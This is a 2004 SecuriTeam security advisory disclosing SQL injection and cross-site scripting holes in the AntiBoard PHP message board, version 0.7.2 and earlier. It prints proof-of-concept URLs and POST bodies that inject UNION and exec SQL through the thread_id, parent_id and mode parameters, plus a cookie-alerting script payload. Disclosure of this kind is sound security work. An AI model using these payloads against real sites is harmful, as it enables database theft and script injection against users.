Date: 1 Aug 2004 14:01:08 +0200
From: SecuriTeam <[email protected]>
To: [email protected]Subject: [UNIX] AntiBoard SQL Injection and Cross Site Scripting Vulnerabilities
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
AntiBoard SQL Injection and Cross Site Scripting Vulnerabilities
------------------------------------------------------------------------
SUMMARY
"
<http://freshmeat.net/redir/antiboard/20085/url_homepage/antiboard_info.php>; AntiBoard is a small and compact multi-threaded bulletin board/message board system written in PHP. It uses either MySQL or PostgreSQL as the database backend, and has support for different languages. It is not meant as the end all be all of bulletin boards, but rather something to easily integrate into your own page."
AntiBoard is vulnerable to the most classic vulnerabilities in dynamic
pages systems - cross site scripting and SQL injection.
DETAILS
Vulnerable Systems:
* AntiBoard version 0.7.2 and prior
The antiboard.php main script is vulnerable through it's 'thread_id' and
it's 'parent_id' parameters. Thus, using a structured HTTP GET query an
attacker is able to send SQL commands to the backend database server.
Examples for SQL injection using UNION queries:
/antiboard.php?thread_id=1%20UNION%20ALL%20select%20field%20from%20whatever--&mode=threaded&sort_order=
/antiboard.php?range=all&mode=threaded&thread_id=1&reply=1&parent_id=1%20UNION%20ALL%20select%20field%20from%20whatever--
/antiboard.php?range=all&thread_id=1%20UNION%20ALL%20select%20field%20from%20whatever--&sort_order=ASC&mode=threaded
/antiboard.php?thread_id=1&parent_id=1%20UNION%20ALL%20select%20field%20from%20whatever--&mode=nested&reply=1
It is also possible to conduct a stored procedure attack through the use
of HTTP POST, in the following manner:
POST antiboard.php poster_name=1111&poster_email=1111&message_title=1111&
message_body=1111&submit=Submit%2bmessage&thread_id=3&
mode=1';%20exec%20whatever--&range=&parent_id=0&reply=reply
And SQL injections through the use of HTTP POST:
POST antiboard.php
poster_name=1111&poster_email=1111&message_title=1111&message_body=1111&
submit=Submit%2bmessage&thread_id=3&mode=threaded&range=&parent_id=1%20UNION ALL select field from antiboard_emails----&reply=reply
In addition to the SQL injection vulnerabilities, AntiBoard is also
vulnerable to XSS attacks which facilitate the execution of script code in
the client side of a victim accessing the site. One possible XSS attack
point is by the following HTTP request (others probably exist):
http:///antiboard.php?thread_id=1&mode=threaded&range=&feedback=<;
script>alert(document.cookie);</script>
Vendor Status:
The vendor has been informed of the issues on the 28th July however no fix
is planned in the near future.
ADDITIONAL INFORMATION
The information has been provided by <mailto:[email protected]> Josh
Gilmour.
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: [email protected]
In order to subscribe to the mailing list, simply forward this email to: [email protected]
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
